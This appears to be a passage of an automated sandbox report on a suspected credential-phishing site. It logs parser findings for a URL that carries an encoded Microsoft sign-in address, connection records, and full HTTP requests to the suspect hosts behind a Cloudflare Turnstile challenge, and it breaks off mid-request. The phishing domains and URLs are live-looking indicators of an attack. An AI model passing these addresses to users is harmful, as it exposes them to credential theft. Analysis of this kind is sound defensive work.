pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGpHTTP Parser: No <meta name="author".. found
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGpHTTP Parser: No <meta name="author".. found
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp...HTTP Parser: No <meta name="copyright".. found
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp...HTTP Parser: No <meta name="copyright".. found
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp...HTTP Parser: No <meta name="copyright".. found
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp...HTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 142.250.185.132:443 -> 192.168.2.4:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49794 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49790 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49792 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49793 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49791 version: TLS 1.2
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.19
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.19
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.19
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.19
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.19
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.19
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.19
            Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.163
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.41
            Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.19
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cd HTTP/1.1Host: h89s9dhj.ccbequipamentos.com.brConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?noiajvga=cebc15b3c86fa69be7285330a66657219c1287ff53c1f7059daa44d10ef1952d669e891ae8484a544c8d16f0be8cc4af98aec84015acb9fd06d2a3ccc941854c HTTP/1.1Host: h89s9dhj.ccbequipamentos.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://h89s9dhj.ccbequipamentos.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://h89s9dhj.ccbequipamentos.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://h89s9dhj.ccbequipamentos.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=921df19f1aa9330c&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: h89s9dhj.ccbequipamentos.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=cebc15b3c86fa69be7285330a66657219c1287ff53c1f7059daa44d10ef1952d669e891ae8484a544c8d16f0be8cc4af98aec84015acb9fd06d2a3ccc941854cAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2100462587:1742228952:oCWRJ_9F7aDLWE5rdVZZqokEYX6VeFO4JC8_BuYfHPM/921df19f1aa9330c/5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/921df19f1aa9330c/1742229751867/S9e8vOBS_eqZ502 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/921df19f1aa9330c/1742229751868/0df0701f524323cd1dd6ed6b0a6c711cea6cb7d910bb71d6d33d24befe49df70/2Si4XeZsCj928_7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/921df19f1aa9330c/1742229751867/S9e8vOBS_eqZ502 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2100462587:1742228952:oCWRJ_9F7aDLWE5rdVZZqokEYX6VeFO4JC8_BuYfHPM/921df19f1aa9330c/5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2100462587:1742228952:oCWRJ_9F7aDLWE5rdVZZqokEYX6VeFO4JC8_BuYfHPM/921df19f1aa9330c/5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2hhcGlpbmVuc3R5cy5jcmlhZG9yZGVjb25leG9lcy5jb20uYnIvIiwiZG9tYWluIjoiaGFwaWluZW5zdHlzLmNyaWFkb3JkZWNvbmV4b2VzLmNvbS5iciIsImtleSI6InFWUDg3RWFGR0NRbiIsInFyYyI6bnVsbCwiaWF0IjoxNzQyMjI5NzYyLCJleHAiOjE3NDIyMjk4ODJ9.bpFU2t6kMODAzyr1sHzSD1xCGWuz2a7omLxO3ziToVg HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: 